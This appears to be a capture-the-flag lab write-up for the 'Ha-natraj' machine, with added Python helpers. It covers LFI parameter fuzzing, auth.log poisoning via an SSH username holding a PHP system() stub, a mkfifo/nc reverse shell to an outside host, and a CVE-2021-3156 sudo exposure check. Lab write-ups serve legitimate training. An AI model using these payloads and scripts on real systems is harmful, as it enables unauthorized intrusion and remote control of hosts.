Ha-natraj

Target IP: 192.168.170.80


Scanning

The port scan shows only two TCP ports open on this machine: SSH and HTTP (port 80). I will start enumeration with the HTTP application.


Enumeration

Port 80: HTTP
The web root serves a plain landing page. Reviewing its source turned up nothing useful, and I found no parameters or forms to work with.

A nikto scan reports two directories, /console and /images.

A directory brute-force finds the same two directories and nothing else.

/console/ is the interesting one: it contains a single script, file.php. It takes no visible parameters, so I fuzzed the parameter name with a directory-traversal value, filtering out empty responses (-fs 0) because a parameter the script ignores returns an empty page:

ffuf -u 'http://192.168.170.80/console/file.php?FUZZ=../../../../../../etc/passwd' -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -fs 0

It worked: the parameter is called file, and it is vulnerable to local file inclusion (LFI) and directory traversal.

A second run, this time fuzzing the value of file with an LFI wordlist, shows which files the traversal can read:

ffuf -u 'http://192.168.170.80/console/file.php?file=FUZZ' -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -fs 0

To turn the LFI into code execution I looked for a log file that I could write to (poison) and then include. I fuzzed absolute paths through the traversal and kept only the log files:

ffuf -u 'http://192.168.170.80/console/file.php?file=../../../../../../../../../../../../../FUZZ' -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt:FUZZ -fs 0 | grep ".log"

/var/log/auth.log is readable. It records authentication events, including every successful and failed SSH login, and sshd writes the attempted username into it, which is what makes it a poisoning target.
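The ffuf runs above do the work, but the decision logic is hidden inside ffuf's filters. The Python script below is an added example, not code from the original writeup: it reproduces the first step offline by trying candidate parameter names with a traversal payload, discarding empty responses (the -fs 0 case), and counting a hit only when the body actually contains /etc/passwd content, so error pages are not mistaken for success. The candidate parameter list, the sample passwd text and the fake_fetch stand-in for the target are constructed for this example; the target URL is the one from the writeup, and fetch() is the real-network variant to swap in.

```python
#!/usr/bin/env python3
"""Minimal LFI parameter prober (added example, not code from the writeup)."""
import re
import urllib.parse
import urllib.request

TARGET = "http://192.168.170.80/console/file.php"      # from the writeup
# Constructed shortlist; burp-parameter-names.txt is the real wordlist.
CANDIDATE_PARAMS = ["id", "page", "path", "file", "include"]
# /etc/passwd starts with the root entry; an error page never matches this.
PASSWD_RE = re.compile(r"^root:[^:]*:0:0:", re.MULTILINE)


def build_traversal(depth: int, target: str = "etc/passwd") -> str:
    """Relative traversal payload; extra ../ are harmless once at /."""
    return "../" * depth + target


def build_url(param: str, value: str) -> str:
    # Leave '/' and '.' alone so the URL matches what ffuf sent; encode the rest.
    return f"{TARGET}?{param}={urllib.parse.quote(value, safe='/')}"


def classify(body: str) -> str:
    """'empty'  -> parameter ignored or file unreadable (what -fs 0 filters out)
       'passwd' -> the traversal reached /etc/passwd
       'other'  -> non-empty but not the requested file (error page, normal page)"""
    if not body.strip():
        return "empty"
    if PASSWD_RE.search(body):
        return "passwd"
    return "other"


def fetch(url: str, timeout: float = 5.0) -> str:
    """Real HTTP fetch for use against the target."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


def find_lfi_param(fetcher, depth: int = 6):
    """Return (param, url) for the first parameter whose response is /etc/passwd,
    or None. The fetcher is injected so the logic can be tested offline."""
    payload = build_traversal(depth)
    for param in CANDIDATE_PARAMS:
        url = build_url(param, payload)
        if classify(fetcher(url)) == "passwd":
            return param, url
    return None


# Constructed stand-in for the target for offline runs: it honours only the
# `file` parameter, mirroring what the ffuf run discovered.
SAMPLE_PASSWD = ("root:x:0:0:root:/root:/bin/bash\n"
                 "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n")


def fake_fetch(url: str) -> str:
    params = urllib.parse.parse_qs(urllib.parse.urlparse(url).query)
    value = params.get("file", [""])[0]
    return SAMPLE_PASSWD if value.endswith("etc/passwd") else ""


if __name__ == "__main__":
    print(find_lfi_param(fake_fetch))   # swap in `fetch` to run against the target
```

The regex anchors on the root entry rather than on response size, which is the part ffuf's size filter cannot do: a script that echoes a warning for every unreadable file also produces a stable non-zero size and would otherwise look like a hit.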


Exploitation

I will now poison the /var/log/auth.log file found above to gain RCE.

To poison the log I attempt an SSH login with the PHP stub as the username. sshd rejects the login but writes the username into /var/log/auth.log as an "Invalid user ..." entry, so the stub lands in the file that file.php will include. The entry is written as soon as the username reaches sshd, so it does not matter what is typed at the password prompt:

ssh '<?php system($_GET["cmd"]); ?>'@192.168.170.80

The original run used ssh '<?php echo system($_GET['cmd']);?>'@192.168.170.80. Because the inner single quotes end and restart the shell's quoted string, what actually reaches sshd is $_GET[cmd] with an unquoted key. PHP 7 accepts that with a warning (treating cmd as the string 'cmd'), while PHP 8 throws an error, so double quotes around the key are the safer form.

It worked: browsing to http://192.168.170.80/console/file.php?file=/var/log/auth.log&cmd=ls;id;whoami renders the log with the output of ls, id and whoami inline. Time to get a reverse shell.

I started a listener on port 80 and requested the URL below, passing a URL-encoded mkfifo reverse shell as cmd. The shell came back to my host.
Decoded payload: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.45.211 80 >/tmp/f
URL-encoded payload: rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fbash%20-i%202%3E%261%7Cnc%20192.168.45.211%2080%20%3E%2Ftmp%2Ff
Full URL with URL-encoded payload: http://192.168.170.80/console/file.php?file=/var/log/auth.log&cmd=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fbash%20-i%202%3E%261%7Cnc%20192.168.45.211%2080%20%3E%2Ftmp%2Ff
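To make the poison-then-include chain reproducible, the Python below is an added example and not code from the writeup. It builds the SSH invocation with the quoting problem removed (the stub is one argv entry and the array key uses double quotes; BatchMode=yes stops ssh from waiting at a password prompt), produces the LFI URL with the command URL-encoded the same way the payload above is, and, for the defender's side, flags auth.log lines whose rejected username contains a PHP tag. The sample log lines are constructed in sshd's format with made-up timestamps and PIDs; the hosts and ports are the ones used in the writeup.

```python
#!/usr/bin/env python3
"""auth.log poisoning helpers (added example, not code from the writeup)."""
import re
import shlex
import subprocess
import urllib.parse

TARGET = "192.168.170.80"                            # from the writeup
LFI_URL = "http://192.168.170.80/console/file.php"   # from the writeup
LOG_PATH = "/var/log/auth.log"

# The stub is sent as the SSH username. sshd rejects the login but records the
# name in auth.log ("Invalid user <name> from ..."); including that file through
# file.php then executes the stub. Double quotes around the key keep the outer
# single quotes of the shell argument intact.
PHP_STUB = '<?php system($_GET["cmd"]); ?>'


def ssh_poison_argv(stub: str = PHP_STUB, host: str = TARGET) -> list:
    """argv for subprocess.run(): no shell is involved, so no quoting issues."""
    return ["ssh", "-o", "StrictHostKeyChecking=no", "-o", "BatchMode=yes",
            f"{stub}@{host}"]


def ssh_poison_cmdline(stub: str = PHP_STUB, host: str = TARGET) -> str:
    """The same command as a copy-pasteable shell line, quoted with shlex."""
    return " ".join(shlex.quote(arg) for arg in ssh_poison_argv(stub, host))


def poison(stub: str = PHP_STUB, host: str = TARGET) -> int:
    """Send the poisoned login attempt; a non-zero exit is expected (login fails)."""
    return subprocess.run(ssh_poison_argv(stub, host), capture_output=True).returncode


def mkfifo_revshell(lhost: str, lport: int) -> str:
    """The mkfifo/nc reverse shell one-liner used in the writeup."""
    return (f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1"
            f"|nc {lhost} {lport} >/tmp/f")


def rce_url(cmd: str, log_path: str = LOG_PATH) -> str:
    """Include the poisoned log and hand `cmd` to the stub, fully URL-encoded
    (safe='' so ';', '|', '&' and '/' cannot be misread by the server)."""
    return f"{LFI_URL}?file={log_path}&cmd={urllib.parse.quote(cmd, safe='')}"


# Defender's check: sshd logs the rejected username verbatim, so a PHP tag in an
# "Invalid user" entry is a strong indicator of log poisoning.
INVALID_USER_RE = re.compile(r"Invalid user (?P<user>.*?) from (?P<ip>\S+)")


def find_poisoned_entries(log_text: str) -> list:
    hits = []
    for line in log_text.splitlines():
        m = INVALID_USER_RE.search(line)
        if m and "<?" in m.group("user"):
            hits.append((m.group("ip"), m.group("user")))
    return hits


# Constructed sample in sshd's log format (timestamps, PIDs and names made up).
SAMPLE_AUTH_LOG = """\
Jan  1 10:00:01 natraj sshd[1234]: Invalid user admin from 192.168.45.211 port 50000
Jan  1 10:00:01 natraj sshd[1234]: Failed password for invalid user admin from 192.168.45.211 port 50000 ssh2
Jan  1 10:00:05 natraj sshd[1240]: Invalid user <?php system($_GET["cmd"]); ?> from 192.168.45.211 port 50002
"""

if __name__ == "__main__":
    print(ssh_poison_cmdline())
    print(rce_url("id"))
    print(rce_url(mkfifo_revshell("192.168.45.211", 80)))
    print(find_poisoned_entries(SAMPLE_AUTH_LOG))
```

Encoding with safe='' is what makes rce_url reproduce the writeup's payload byte for byte; an unencoded & or ; in cmd would be split by the query-string parser and never reach system().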
It is time to elevate privileges!


Privilege Escalation

Local enumeration shows a misconfiguration involving systemctl, which could be one route to root.

However, sudo itself looks like an easier target. The installed version is 1.8.21p2, which falls in the range affected by CVE-2021-3156 (the heap overflow in sudoedit, also known as Baron Samedit, affecting 1.8.2 through 1.8.31p2 and 1.9.0 through 1.9.5p1). Version strings alone can mislead, since distributions backport fixes without bumping them, so it is worth confirming with the sudoedit -s / check before spending time on an exploit. I used a public exploit for it.
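Before reaching for an exploit it is worth confirming that the version really is affected. The Python below is an added example, not from the writeup: it parses the sudo --version banner against the ranges in the CVE-2021-3156 advisory (1.8.2 through 1.8.31p2 and 1.9.0 through 1.9.5p1) and interprets the advisory's runtime test, sudoedit -s /, which answers with a "sudoedit:" error on an affected build and a usage message on a patched one. The banner strings and probe outputs in the tests are constructed; the version on the box, 1.8.21p2, is the one from the writeup. The caveat in the code matters in practice: distributions backport the fix without changing the upstream version string, so the runtime probe is the result to trust.

```python
#!/usr/bin/env python3
"""CVE-2021-3156 (Baron Samedit) exposure check (added example, not from the writeup)."""
import re
import subprocess

# Affected ranges from the advisory, as (major, minor, patch, p-level) tuples.
VULNERABLE_RANGES = [
    ((1, 8, 2, 0), (1, 8, 31, 2)),   # 1.8.2  .. 1.8.31p2
    ((1, 9, 0, 0), (1, 9, 5, 1)),    # 1.9.0  .. 1.9.5p1
]
BANNER_RE = re.compile(r"Sudo version (\d+)\.(\d+)\.(\d+)(?:p(\d+))?")


def parse_sudo_version(banner: str):
    """'Sudo version 1.8.21p2' -> (1, 8, 21, 2); None if the banner is unrecognised."""
    m = BANNER_RE.search(banner)
    if not m:
        return None
    major, minor, patch, plevel = m.groups()
    return (int(major), int(minor), int(patch), int(plevel or 0))


def version_in_affected_range(banner: str) -> bool:
    """Version-string check only. Caveat: distro packages (for example Ubuntu's
    1.8.21p2-3ubuntu1.4) backport the fix and keep this banner, so True here
    is a hint, not proof; confirm with the sudoedit probe below."""
    v = parse_sudo_version(banner)
    if v is None:
        return False
    return any(lo <= v <= hi for lo, hi in VULNERABLE_RANGES)


def interpret_sudoedit_probe(output: str) -> str:
    """Classify the output of `sudoedit -s /`, the advisory's test:
       'vulnerable' -> an error starting with 'sudoedit:' (the -s flag was accepted
                       and sudoedit went on to complain that / is not a regular file)
       'patched'    -> a usage message (the flag combination is rejected up front)
       'unknown'    -> anything else"""
    text = output.lstrip()
    if text.startswith("sudoedit:"):
        return "vulnerable"
    if text.startswith("usage:"):
        return "patched"
    return "unknown"


def run_sudoedit_probe() -> str:
    """Run the probe on the local host; it is harmless and never edits anything."""
    try:
        proc = subprocess.run(["sudoedit", "-s", "/"], capture_output=True, text=True)
    except FileNotFoundError:
        return "unknown"
    return interpret_sudoedit_probe(proc.stdout + proc.stderr)


if __name__ == "__main__":
    banner = subprocess.run(["sudo", "--version"], capture_output=True, text=True).stdout
    print(banner.splitlines()[0] if banner else "no sudo")
    print("version in affected range:", version_in_affected_range(banner))
    print("sudoedit probe:", run_sudoedit_probe())
```

The probe needs no privileges: the bug is in argument handling before authentication, which is exactly why the error appears without a password prompt on an affected build.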

The exploit ran successfully and dropped me into a root shell.


Flags

The local.txt flag, read after gaining the initial foothold on the machine.

The proof.txt flag, read as root after exploiting the vulnerable sudo binary.